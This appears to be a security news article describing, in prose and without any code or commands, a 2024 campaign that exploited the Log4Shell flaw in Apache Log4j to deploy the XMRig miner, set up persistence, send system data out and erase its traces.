The Log4j vulnerability, also known as Log4Shell, has been exploited in recent attacks through obfuscated LDAP requests, resulting in the execution of malicious scripts that establish persistence, gather system information, and exfiltrate data. These attacks highlight the ongoing threat posed by this vulnerability, as attackers continue to exploit it to maintain control over compromised systems and evade detection.
Discovered in November 2021, the Log4Shell vulnerability in the Apache Log4j library has a CVSS score of 10, making it a critical security issue that allows attackers to remotely execute arbitrary code. Due to the widespread use of Log4j, it has become a prime target for exploitation by various threat actors, including nation-state groups and cybercriminals. Groups like APT41 and Conti have incorporated Log4Shell exploits into their operations, underscoring the significant impact of this vulnerability on global cybersecurity.
On July 30, 2024, a Confluence honeypot detected an attempt to exploit the Log4Shell vulnerability from a known Tor exit node, marking the beginning of an opportunistic campaign. The attackers leveraged the vulnerability to deploy XMRig, a cryptocurrency mining software, on compromised systems, showcasing the ongoing threat posed by opportunistic threat actors who exploit vulnerabilities for malicious purposes.
In one specific attack scenario, an attacker exploited the Log4j vulnerability using a cleverly obfuscated payload containing an LDAP URL, triggering the execution of a malicious Java class from a remote server on the vulnerable Java application. This class downloaded a secondary script (“lte”) from another server and executed it with root privileges, highlighting the potential for further malicious activity due to its ability to run arbitrary commands.
The malicious Java class then downloaded an obfuscated Bash script from a remote server, which conducted system reconnaissance, downloaded and configured a cryptocurrency miner, established persistence using systemd or cron jobs, and set up reverse shells for remote control. Comprehensive system information, including CPU details, OS version, user data, network connections, group memberships, running processes, and system uptime, was gathered and transmitted to a remote server via an HTTP POST request.
To evade detection, the script self-destructed and cleared its tracks by overwriting the bash history file and erasing the current shell’s command history. An investigation into potential Log4Shell exploitation by DataDog revealed several indicators of compromise, including suspicious IP addresses and domain names, as well as suspicious file paths on the compromised system.
Overall, the Log4Shell vulnerability continues to be a significant cybersecurity threat, with attackers exploiting it to carry out various malicious activities and evade detection. Organizations must remain vigilant and implement appropriate security measures to protect against the risks associated with this critical flaw in the Apache Log4j library.